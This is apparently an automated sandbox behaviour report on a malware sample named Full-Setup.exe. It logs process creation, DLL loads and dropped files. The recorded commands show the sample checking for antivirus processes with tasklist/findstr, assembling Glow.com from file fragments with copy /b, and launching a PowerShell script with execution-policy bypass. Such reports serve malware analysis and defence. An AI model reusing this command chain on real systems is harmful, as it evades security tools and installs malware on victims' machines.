Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 600044
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Mary" Exploring
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\600044\Glow.com Glow.com k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Full-Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 600044	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Mary" Exploring	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\600044\Glow.com Glow.com k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1"	Jump to behavior

Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\Full-Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Full-Setup.exe

Static file information: File size 1286284 > 1048576

Source: Full-Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Full-Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: Full-Setup.exe

Static PE information: real checksum: 0x13f1c7 should be: 0x147f8b

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003D0315 push cs; retn 003Ch	10_2_003D0318
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A0DE6 push ecx; ret	10_2_003A0DF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_04800DB0 push edi; ret	15_2_04800DD2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_077131DF push FFFFFFE8h; retf	15_2_077131E1

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_004126DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		10_2_004126DD
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_0039FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		10_2_0039FC7C

Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
